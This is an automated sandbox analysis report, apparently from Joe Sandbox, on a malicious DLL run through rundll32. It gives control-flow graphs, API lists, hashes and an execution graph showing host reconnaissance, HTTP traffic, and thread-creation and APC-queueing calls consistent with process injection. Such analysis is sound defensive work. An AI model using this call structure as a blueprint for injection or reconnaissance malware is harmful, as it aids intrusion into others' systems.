                                                                    control_flow_graph 0 27619644d00-27619644daf GetUserNameW GetComputerNameExW 1 27619644dc7-27619644df1 GetComputerNameExW call 27619654ad0 0->1 2 27619644db1-27619644dc1 call 2761964b4c0 0->2 7 27619644e58-27619644e92 call 27619652750 call 2761963dfc0 1->7 8 27619644df3-27619644e1a GetTokenInformation 1->8 2->1 22 27619644eaa-27619644ed1 GetNativeSystemInfo 7->22 23 27619644e94-27619644ea5 call 27619653de0 7->23 9 27619644e1c-27619644e28 8->9 10 27619644e4e-27619644e53 call 27619654000 8->10 12 27619644e2a-27619644e39 call 27619653de0 9->12 13 27619644e3e-27619644e49 call 27619653de0 9->13 10->7 12->13 13->10 25 27619644ee8-27619644eec 22->25 26 27619644ed3-27619644ee6 22->26 23->22 28 27619644f17-27619644f2d call 27619653de0 25->28 29 27619644eee-27619644efd 25->29 27 27619644f01-27619644f15 call 27619653de0 26->27 33 27619644f32-27619644f42 27->33 28->33 29->27 35 27619644f89-27619644fb9 GetAdaptersInfo 33->35 36 27619644f44-27619644f84 call 27619653b90 call 27619653de0 call 27619653b90 * 2 33->36 40 27619644fbb-27619644fdc call 2761964b4e0 * 2 35->40 41 27619644fdd-27619644fe3 35->41 36->35 41->40 44 27619644fe5-27619644ffd call 2761964b4c0 GetAdaptersInfo 41->44 44->40 53 27619644fff-2761964500c 44->53 55 27619645012-27619645015 53->55 55->40 56 27619645017-27619645018 55->56 57 2761964501f-27619645031 call 276196293e0 56->57 60 27619645033-27619645043 call 27619653de0 57->60 61 27619645045-2761964504c 57->61 60->57 61->40 63 27619645052-27619645062 call 27619653de0 61->63 63->55
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.4537344624.0000027619621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000027619621000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_27619621000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
                                                                    • String ID:
                                                                    • API String ID: 1596153048-0
                                                                    • Opcode ID: 0a5131bd6414b1282a0f66d752e02dd7b2870491c20533042b7ec16988b63654
                                                                    • Instruction ID: fc6de5b0a4b9f929ec2e02aaa9f65fb1ffd1ede883d057874adf6f2846d3f2c9
                                                                    • Opcode Fuzzy Hash: 0a5131bd6414b1282a0f66d752e02dd7b2870491c20533042b7ec16988b63654
                                                                    • Instruction Fuzzy Hash: 47A1D33021CF888BFB54AB54D86E7DAB3E1FB94740F804529A84ED3392DA74D945CBD2
                                                                    Function 00007DF4051C0100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.2422249435.00007DF4051C0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4051C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_7df4051c0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateSnapshotToolhelp32
                                                                    • String ID: @
                                                                    • API String ID: 3332741929-2766056989
                                                                    • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                    • Instruction ID: fead47ab9d65bdae9bed47f4f8db019143a3840a82c3428f943998f4b283dea3
                                                                    • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                    • Instruction Fuzzy Hash: 0C71CF31614A4C8FEB94EF5CC858BAD77F1FB98315F104226E81ED72A0DB749954CB80
                                                                    Function 0000027619621600 Relevance: 1.7, APIs: 1, Instructions: 169threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.4537344624.0000027619621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000027619621000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_27619621000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ExitThreadUser
                                                                    • String ID:
                                                                    • API String ID: 3424019298-0
                                                                    • Opcode ID: c7cfbd4c28cfd34a067c4dec962a0dff76d3cfd4b019f48227f7b9b53671fbdc
                                                                    • Instruction ID: 08cf26aaf3ffd475687a30ed649e88e22e4444696bc88a3495641704f5194b68
                                                                    • Opcode Fuzzy Hash: c7cfbd4c28cfd34a067c4dec962a0dff76d3cfd4b019f48227f7b9b53671fbdc
                                                                    • Instruction Fuzzy Hash: CE51D37410CA488FF748EF28D85D7B977E1FB96311F500259E49ED32A2CA38E802CB95
                                                                    Function 00000276197BD2B6 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.2085178230.0000027619780000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027619780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_27619780000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                    • Instruction ID: 84887cc101af63f21472ff77c1b48dcdc3a013849f0ae69c618340443e559901
                                                                    • Opcode Fuzzy Hash: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
                                                                    • Instruction Fuzzy Hash: F6F081B0618B408BE7549F1884C967577E1FB98755F64452EE88A87361CB319842CB43
                                                                    Function 00000276197BD326 Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.2085178230.0000027619780000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027619780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_27619780000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                    • Instruction ID: e3303e5ee617160796ebabb4e0090f83c55a9886ee24f68c5a044d4337b42e1d
                                                                    • Opcode Fuzzy Hash: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
                                                                    • Instruction Fuzzy Hash: 3AF05470A28F444BD744AF2C884E63577E1FBA8645F54452EA84DD7361DB35E4428B43
                                                                    Function 0000027619627830 Relevance: 9.3, APIs: 6, Instructions: 340networkmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 67 27619627830-27619627883 68 2761962788a-27619627892 InternetOpenW 67->68 69 27619627885-27619627888 67->69 70 27619627898-276196278d7 InternetConnectW 68->70 71 27619627af9-27619627afd 68->71 69->68 70->71 72 276196278dd-2761962792b 70->72 73 27619627aff-27619627b0c 71->73 72->73 79 27619627931-2761962793b 72->79 74 27619627b17-27619627b1a 73->74 75 27619627b0e-27619627b11 InternetCloseHandle 73->75 77 27619627b1c-27619627b1d 74->77 78 27619627b25-27619627b28 74->78 75->74 77->78 80 27619627b2a-27619627b2b 78->80 81 27619627b33-27619627b3b 78->81 84 2761962793d-27619627945 79->84 85 27619627990-276196279ab 79->85 80->81 82 27619627bd0-27619627be3 81->82 83 27619627b41-27619627b4b 81->83 86 27619627b4d-27619627b54 call 27619651230 83->86 87 27619627b62-27619627b73 83->87 84->85 88 27619627947-2761962798b call 27619652750 * 2 84->88 85->73 96 276196279b1-276196279ba 85->96 86->87 98 27619627b56-27619627b60 call 2761964b4e0 86->98 91 27619627b7a-27619627b8a call 2761962cb60 87->91 92 27619627b75-27619627b78 87->92 88->85 105 27619627b8c-27619627bb8 call 2761962a050 call 2761964b4e0 91->105 106 27619627bba-27619627bce call 27619651410 91->106 92->82 92->91 99 276196279e6-27619627a0a 96->99 100 276196279bc-276196279de call 27619651270 HttpSendRequestA 96->100 98->82 114 27619627a0c 99->114 100->73 117 276196279e4-27619627a16 100->117 105->82 106->82 106->98 114->100 121 27619627a18-27619627a1f call 2761964b4e0 117->121 122 27619627a24-27619627a3b call 2761964b4c0 117->122 121->122 126 27619627a3f-27619627a5b InternetQueryDataAvailable 122->126 127 27619627a61-27619627a69 126->127 128 27619627ae3-27619627af7 call 2761964b4e0 126->128 127->128 130 27619627a6b-27619627a7e 127->130 128->75 130->128 133 27619627a80-27619627a86 130->133 133->128 134 27619627a88-27619627a96 133->134 135 27619627a98-27619627aaa RtlReAllocateHeap 134->135 136 27619627aac-27619627aaf call 2761964b4c0 134->136 137 27619627ab4-27619627ade call 276196444a0 135->137 136->137 137->126
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.4537344624.0000027619621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000027619621000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_27619621000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Heap$AllocateAvailableCloseConnectDataFreeHandleHttpOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 2835091696-0
                                                                    • Opcode ID: b511c7863b3ab9a59219a4b3e63d03ff5358a22e987fa0d3a10f99e9fec2f975
                                                                    • Instruction ID: 0f1ed005750c748dbc9d23cfe8e8163e65e43a26c0587a977b48f03841931230
                                                                    • Opcode Fuzzy Hash: b511c7863b3ab9a59219a4b3e63d03ff5358a22e987fa0d3a10f99e9fec2f975
                                                                    • Instruction Fuzzy Hash: 37B18F3021CF488BF754DF28D85DBAAB7D5FB98340F840569A84ED3295DB78E84187D2
                                                                    Function 00007DF4051C0000 Relevance: 6.1, APIs: 4, Instructions: 88processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.2422249435.00007DF4051C0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4051C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_7df4051c0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 1083639309-0
                                                                    • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                    • Instruction ID: af99fb76aaf4e5721d71b51a7dd243436e203d07f8fec3dc3f2df2350f77f626
                                                                    • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                    • Instruction Fuzzy Hash: 1221CB3061494C8FEBA1EB5CCC58BEE37F1FBA8310F404226D81EDB294EE35AA548750
                                                                    Function 0000027619628ED0 Relevance: 1.9, APIs: 1, Instructions: 410synchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.4537344624.0000027619621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000027619621000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_27619621000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMutex
                                                                    • String ID:
                                                                    • API String ID: 1964310414-0
                                                                    • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                    • Instruction ID: a7e0b9079de08a95b49619071a62cc12b65e588fa82c2ecefcbe085ecc7218d2
                                                                    • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                    • Instruction Fuzzy Hash: 73E11071408B4D8FE751EF14E899BA6B7F4F768340F60067BE84EC2261DB389245CB86
                                                                    Function 000002761962CCE0 Relevance: 1.6, APIs: 1, Instructions: 114libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.4537344624.0000027619621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000027619621000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_27619621000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcedure
                                                                    • String ID:
                                                                    • API String ID: 3653107232-0
                                                                    • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                    • Instruction ID: b47bf944f9c2fc0dd592b549e4c4f9870292d50b392e239e642c9d8d976641f2
                                                                    • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                    • Instruction Fuzzy Hash: BF31B23151CB484BE764AB58DC4E7BAB7E0FB85310F90066EE58EC3352D630A98687D7
                                                                    Function 000002761964B4E0 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 284 2761964b4e0-2761964b4ee 285 2761964b523-2761964b52f 284->285 286 2761964b4f0-2761964b505 284->286 286->285 288 2761964b507-2761964b51d call 27619644ce0 RtlFreeHeap 286->288 288->285
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.4537344624.0000027619621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000027619621000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_27619621000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                    • Instruction ID: 36e3705b53a2d51f62ba3b1d0ab3bbc7a3e1b552114c7753f11056e38f7bdf1f
                                                                    • Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                    • Instruction Fuzzy Hash: A4F01C30314E088BFB58EBBAECDD76577E2FB9C341B848054A409C7294DB389841CB52
                                                                    Function 00000276197BCA56 Relevance: .1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000003.2085178230.0000027619780000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027619780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_27619780000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
                                                                    • Instruction ID: 5c289638610935c11f324b0bc5c22f25e195e3caa83ef2dd990b29922300cc8f
                                                                    • Opcode Fuzzy Hash: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
                                                                    • Instruction Fuzzy Hash: 0201F421A1DF5A0BE799E66D68CD7A276E2FBD8310F9CC0A5E80EC7386D824C9414380

                                                                    Execution Graph

                                                                    Execution Coverage:4.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:961
                                                                    Total number of Limit Nodes:8
                                                                    execution_graph 18379 2339fb955c0 18382 2339fb95609 18379->18382 18380 2339fbb4360 NtCreateThreadEx 18383 2339fb95795 18380->18383 18381 2339fb95eed 18382->18380 18382->18381 18383->18381 18415 2339fb9f3a0 18383->18415 18386 2339fbb4ff0 NtQueueApcThread 18387 2339fb95e84 18386->18387 18387->18381 18388 2339fbb4ff0 NtQueueApcThread 18387->18388 18389 2339fb95eb0 18388->18389 18389->18381 18390 2339fb95ec5 18389->18390 18392 2339fbb4ff0 NtQueueApcThread 18389->18392 18390->18381 18391 2339fbb4ff0 NtQueueApcThread 18390->18391 18393 2339fb95ee9 18391->18393 18394 2339fb95f0e 18392->18394 18393->18381 18396 2339fbb4ff0 NtQueueApcThread 18393->18396 18394->18381 18395 2339fbb4ff0 NtQueueApcThread 18394->18395 18395->18390 18397 2339fb95f67 18396->18397 18397->18381 18398 2339fbb4ff0 NtQueueApcThread 18397->18398 18399 2339fb95f93 18398->18399 18399->18381 18400 2339fbb4ff0 NtQueueApcThread 18399->18400 18401 2339fb95fbf 18400->18401 18401->18381 18402 2339fb95fd4 18401->18402 18404 2339fbb4ff0 NtQueueApcThread 18401->18404 18402->18381 18403 2339fbb4ff0 NtQueueApcThread 18402->18403 18405 2339fb95ff8 18403->18405 18404->18402 18405->18381 18406 2339fb96033 18405->18406 18407 2339fbb4ff0 NtQueueApcThread 18405->18407 18406->18381 18408 2339fbb4ff0 NtQueueApcThread 18406->18408 18407->18406 18409 2339fb96057 18408->18409 18409->18381 18410 2339fbb4ff0 NtQueueApcThread 18409->18410 18411 2339fb960a9 18410->18411 18411->18381 18412 2339fbb4ff0 NtQueueApcThread 18411->18412 18413 2339fb960d5 18412->18413 18413->18381 18421 2339fbb3a40 18413->18421 18416 2339fb9f3bd 18415->18416 18417 2339fbab4e0 RtlFreeHeap 18416->18417 18418 2339fb9f61c 18417->18418 18419 2339fb95871 18418->18419 18420 2339fbab4e0 RtlFreeHeap 18418->18420 18419->18381 18419->18386 18420->18419 18426 2339fbb4be0 18421->18426 18423 2339fbb3b56 18423->18381 18424 2339fbb3a97 18424->18423 18425 2339fbb4be0 NtProtectVirtualMemory 18424->18425 18425->18424 18428 2339fbb4c02 18426->18428 18427 2339fbb4c5e 18427->18424 18428->18427 18429 2339fbb4c5c NtProtectVirtualMemory 18428->18429 18429->18427 18581 2339fba35c0 18583 2339fba35e1 18581->18583 18582 2339fba3788 18583->18582 18584 2339fba366b 18583->18584 18585 2339fb8a050 RtlFreeHeap 18583->18585 18586 2339fba368d 18584->18586 18587 2339fba36c6 18584->18587 18585->18584 18588 2339fbb3de0 RtlFreeHeap 18586->18588 18589 2339fba5560 RtlFreeHeap 18587->18589 18590 2339fba36b4 18588->18590 18591 2339fba36e6 18589->18591 18592 2339fb99830 RtlFreeHeap 18590->18592 18593 2339fba36c1 18591->18593 18595 2339fba5560 RtlFreeHeap 18591->18595 18592->18593 18594 2339fbab4e0 RtlFreeHeap 18593->18594 18596 2339fba3761 18594->18596 18597 2339fba3703 18595->18597 18598 2339fbab4e0 RtlFreeHeap 18596->18598 18600 2339fb9be20 RtlFreeHeap 18597->18600 18599 2339fba3769 18598->18599 18601 2339fbab4e0 RtlFreeHeap 18599->18601 18602 2339fba3727 18600->18602 18603 2339fba3773 18601->18603 18602->18593 18608 2339fbab5e0 18602->18608 18604 2339fbab4e0 RtlFreeHeap 18603->18604 18606 2339fba377b 18604->18606 18607 2339fbab4e0 RtlFreeHeap 18606->18607 18607->18582 18610 2339fbab5f6 18608->18610 18609 2339fb99830 RtlFreeHeap 18611 2339fbabc69 18609->18611 18612 2339fbab750 18610->18612 18621 2339fbab77f 18610->18621 18641 2339fbab77a 18610->18641 18613 2339fbab4e0 RtlFreeHeap 18611->18613 18642 2339fba6a60 18612->18642 18614 2339fbabc71 18613->18614 18616 2339fbab4e0 RtlFreeHeap 18614->18616 18629 2339fbabc91 18616->18629 18617 2339fb99830 RtlFreeHeap 18618 2339fbaba56 18617->18618 18619 2339fbab4e0 RtlFreeHeap 18618->18619 18620 2339fbaba5e 18619->18620 18623 2339fbaba6c 18620->18623 18624 2339fbaba97 18620->18624 18620->18641 18630 2339fbab8ae 18621->18630 18621->18641 18656 2339fbb0790 18621->18656 18622 2339fbb3ba0 RtlFreeHeap 18626 2339fbab9be 18622->18626 18664 2339fba3a20 18623->18664 18628 2339fbaba95 18624->18628 18690 2339fba37b0 18624->18690 18631 2339fbb3ba0 RtlFreeHeap 18626->18631 18636 2339fbb3ba0 RtlFreeHeap 18628->18636 18628->18641 18633 2339fbabccc 18629->18633 18635 2339fbaea70 RtlFreeHeap 18629->18635 18630->18622 18630->18641 18634 2339fbab9e8 18631->18634 18633->18593 18637 2339fbb3ba0 RtlFreeHeap 18634->18637 18635->18633 18638 2339fbabb25 18636->18638 18640 2339fbab76f 18637->18640 18639 2339fbb3ba0 RtlFreeHeap 18638->18639 18639->18641 18640->18617 18640->18641 18641->18609 18643 2339fba6a9f 18642->18643 18644 2339fba6d91 18643->18644 18647 2339fba6dca 18643->18647 18649 2339fbb0790 RtlFreeHeap 18643->18649 18645 2339fbab4e0 RtlFreeHeap 18644->18645 18646 2339fba6f4b 18644->18646 18645->18646 18646->18640 18647->18644 18648 2339fbb3ba0 RtlFreeHeap 18647->18648 18650 2339fba6eb1 18648->18650 18649->18647 18651 2339fbb3ba0 RtlFreeHeap 18650->18651 18652 2339fba6ed7 18651->18652 18653 2339fbb3ba0 RtlFreeHeap 18652->18653 18654 2339fba6efd 18653->18654 18655 2339fbb3ba0 RtlFreeHeap 18654->18655 18655->18644 18663 2339fbb07df 18656->18663 18657 2339fbaea70 RtlFreeHeap 18658 2339fbb07f9 18657->18658 18659 2339fbab4e0 RtlFreeHeap 18658->18659 18660 2339fbb08fb 18659->18660 18661 2339fbab4e0 RtlFreeHeap 18660->18661 18662 2339fbb0905 18661->18662 18662->18630 18663->18657 18663->18658 18668 2339fba3a97 18664->18668 18684 2339fba3a8c 18664->18684 18665 2339fb99830 RtlFreeHeap 18666 2339fba3e3c 18665->18666 18669 2339fba3e4e 18666->18669 18673 2339fbaea70 RtlFreeHeap 18666->18673 18667 2339fba3c01 18670 2339fba3c6b 18667->18670 18671 2339fba3ca4 18667->18671 18668->18667 18668->18684 18704 2339fba96c0 18668->18704 18674 2339fbab4e0 RtlFreeHeap 18669->18674 18708 2339fb86340 18670->18708 18672 2339fba3cab 18671->18672 18677 2339fba3ce0 18671->18677 18716 2339fb83eb0 18672->18716 18673->18669 18678 2339fba3e5b 18674->18678 18683 2339fba3c9f 18677->18683 18724 2339fb83c30 18677->18724 18679 2339fbab4e0 RtlFreeHeap 18678->18679 18681 2339fba3e68 18679->18681 18681->18628 18683->18684 18742 2339fb85d60 18683->18742 18684->18665 18686 2339fba3ac6 18686->18684 18687 2339fba3bb8 18686->18687 18688 2339fbaea70 RtlFreeHeap 18686->18688 18689 2339fbb3ba0 RtlFreeHeap 18687->18689 18688->18686 18689->18667 18693 2339fba3811 18690->18693 18703 2339fba39e5 18690->18703 18691 2339fbab4e0 RtlFreeHeap 18692 2339fba39f8 18691->18692 18692->18628 18694 2339fba38b3 18693->18694 18695 2339fba387a 18693->18695 18693->18703 18696 2339fba38b8 18694->18696 18698 2339fba38ed 18694->18698 18697 2339fb86340 RtlFreeHeap 18695->18697 18700 2339fb83eb0 RtlFreeHeap 18696->18700 18699 2339fba38ae 18697->18699 18698->18699 18701 2339fb83c30 4 API calls 18698->18701 18702 2339fb85d60 3 API calls 18699->18702 18700->18699 18701->18699 18702->18703 18703->18691 18707 2339fba96e2 18704->18707 18705 2339fba9724 18705->18686 18706 2339fbab4e0 RtlFreeHeap 18706->18707 18707->18705 18707->18706 18712 2339fb86395 18708->18712 18709 2339fb99830 RtlFreeHeap 18710 2339fb86465 18709->18710 18711 2339fbab4e0 RtlFreeHeap 18710->18711 18713 2339fb8646f 18711->18713 18712->18709 18714 2339fbaea70 RtlFreeHeap 18713->18714 18715 2339fb86488 18713->18715 18714->18715 18715->18683 18721 2339fb83f23 18716->18721 18717 2339fb99830 RtlFreeHeap 18718 2339fb84328 18717->18718 18719 2339fbab4e0 RtlFreeHeap 18718->18719 18720 2339fb84332 18719->18720 18722 2339fbaea70 RtlFreeHeap 18720->18722 18723 2339fb8434c 18720->18723 18721->18717 18722->18723 18723->18683 18725 2339fb83ca3 18724->18725 18737 2339fb83cae 18724->18737 18774 2339fbb3f40 18725->18774 18727 2339fb83ca8 18731 2339fbb4be0 NtProtectVirtualMemory 18727->18731 18741 2339fb83cac 18727->18741 18728 2339fb99830 RtlFreeHeap 18729 2339fb83d20 18728->18729 18730 2339fbab4e0 RtlFreeHeap 18729->18730 18732 2339fb83d2a 18730->18732 18731->18737 18733 2339fb83da0 18732->18733 18734 2339fbaea70 RtlFreeHeap 18732->18734 18733->18683 18735 2339fb83d4e 18734->18735 18736 2339fb83d78 18735->18736 18738 2339fbb4740 NtFreeVirtualMemory 18735->18738 18736->18733 18740 2339fbb4740 NtFreeVirtualMemory 18736->18740 18739 2339fbb3f40 NtAllocateVirtualMemory 18737->18739 18737->18741 18738->18736 18739->18741 18740->18733 18741->18728 18743 2339fb85dc2 18742->18743 18772 2339fb85ec8 18742->18772 18745 2339fbb3ba0 RtlFreeHeap 18743->18745 18744 2339fb99830 RtlFreeHeap 18746 2339fb862e5 18744->18746 18747 2339fb85e0a 18745->18747 18748 2339fbab4e0 RtlFreeHeap 18746->18748 18749 2339fbb3ba0 RtlFreeHeap 18747->18749 18750 2339fb862ed 18748->18750 18751 2339fb85e2d 18749->18751 18752 2339fb86304 18750->18752 18755 2339fbaea70 RtlFreeHeap 18750->18755 18753 2339fbb3ba0 RtlFreeHeap 18751->18753 18754 2339fb86319 18752->18754 18757 2339fbaea70 RtlFreeHeap 18752->18757 18756 2339fb85e50 18753->18756 18754->18684 18755->18752 18758 2339fb85ecd 18756->18758 18759 2339fb85e68 18756->18759 18757->18754 18760 2339fb85ed7 18758->18760 18761 2339fb85f6a 18758->18761 18765 2339fbb3ba0 RtlFreeHeap 18759->18765 18759->18772 18768 2339fbb3ba0 RtlFreeHeap 18760->18768 18760->18772 18762 2339fb85f8b 18761->18762 18769 2339fb861a1 18761->18769 18763 2339fb86033 18762->18763 18764 2339fb8605a 18762->18764 18773 2339fb86006 18762->18773 18766 2339fbb4360 NtCreateThreadEx 18763->18766 18767 2339fbb4360 NtCreateThreadEx 18764->18767 18765->18772 18766->18773 18767->18773 18768->18772 18771 2339fbb4ff0 NtQueueApcThread 18769->18771 18769->18772 18770 2339fbb3ba0 RtlFreeHeap 18770->18772 18771->18772 18772->18744 18773->18770 18773->18772 18775 2339fbb3f69 18774->18775 18776 2339fbb3fc9 18775->18776 18777 2339fbb3fc7 NtAllocateVirtualMemory 18775->18777 18776->18727 18777->18776 16729 2339fb81600 16731 2339fb8162c 16729->16731 16730 2339fb81792 RtlExitUserThread 16731->16730 16738 2339fbb3ba0 16731->16738 16733 2339fb81717 16744 2339fb99830 16733->16744 16735 2339fb81735 16736 2339fbab4e0 RtlFreeHeap 16735->16736 16737 2339fb8173d 16736->16737 16737->16730 16739 2339fbb3bd8 16738->16739 16740 2339fbb3bc7 16738->16740 16742 2339fbb3cd0 RtlFreeHeap 16739->16742 16743 2339fbb3c87 16739->16743 16748 2339fbb3cd0 16740->16748 16742->16743 16743->16733 16745 2339fb9984d 16744->16745 16747 2339fb99886 16745->16747 16758 2339fb9dfc0 16745->16758 16749 2339fbb3d18 16748->16749 16753 2339fbb3d56 16749->16753 16754 2339fbab4e0 16749->16754 16750 2339fbab4e0 RtlFreeHeap 16751 2339fbb3dcc 16750->16751 16751->16739 16753->16750 16755 2339fbab523 16754->16755 16756 2339fbab4f0 16754->16756 16755->16753 16756->16755 16757 2339fbab511 RtlFreeHeap 16756->16757 16757->16755 16760 2339fb9dff1 16758->16760 16759 2339fb9e03d 16759->16747 16760->16759 16761 2339fbab4e0 RtlFreeHeap 16760->16761 16761->16759 16762 2339fb87bf0 16763 2339fb87c06 16762->16763 16778 2339fb82930 16763->16778 16765 2339fb87c24 16917 2339fb88ed0 16765->16917 16767 2339fb87d64 16950 2339fb87f70 16767->16950 16769 2339fb87d8c 17091 2339fba4d00 GetUserNameW GetComputerNameExW 16769->17091 16771 2339fb87f54 16772 2339fb87da4 16772->16771 17123 2339fbb4740 16772->17123 16776 2339fb87e3b 16776->16771 16777 2339fb94700 RtlFreeHeap 16776->16777 17127 2339fb93d90 16776->17127 17173 2339fb88bc0 16776->17173 16777->16776 17222 2339fb8ffe0 16778->17222 16784 2339fb8f5f5 16784->16765 16785 2339fb82943 16785->16784 17294 2339fb8cce0 16785->17294 16788 2339fb8cce0 LdrGetProcedureAddress 16789 2339fb8ee2b 16788->16789 16790 2339fb8cce0 LdrGetProcedureAddress 16789->16790 16791 2339fb8ee54 16790->16791 16792 2339fb8cce0 LdrGetProcedureAddress 16791->16792 16793 2339fb8ee73 16792->16793 16794 2339fb8cce0 LdrGetProcedureAddress 16793->16794 16795 2339fb8ee92 16794->16795 16796 2339fb8cce0 LdrGetProcedureAddress 16795->16796 16797 2339fb8eeb1 16796->16797 16798 2339fb8cce0 LdrGetProcedureAddress 16797->16798 16799 2339fb8eed0 16798->16799 16800 2339fb8cce0 LdrGetProcedureAddress 16799->16800 16801 2339fb8eeef 16800->16801 16802 2339fb8cce0 LdrGetProcedureAddress 16801->16802 16803 2339fb8ef0e 16802->16803 16804 2339fb8cce0 LdrGetProcedureAddress 16803->16804 16805 2339fb8ef2d 16804->16805 16806 2339fb8cce0 LdrGetProcedureAddress 16805->16806 16807 2339fb8ef4c 16806->16807 16808 2339fb8cce0 LdrGetProcedureAddress 16807->16808 16809 2339fb8ef6b 16808->16809 16810 2339fb8cce0 LdrGetProcedureAddress 16809->16810 16811 2339fb8ef8a 16810->16811 16812 2339fb8cce0 LdrGetProcedureAddress 16811->16812 16813 2339fb8efa9 16812->16813 16814 2339fb8cce0 LdrGetProcedureAddress 16813->16814 16815 2339fb8efc8 16814->16815 16816 2339fb8cce0 LdrGetProcedureAddress 16815->16816 16817 2339fb8efe7 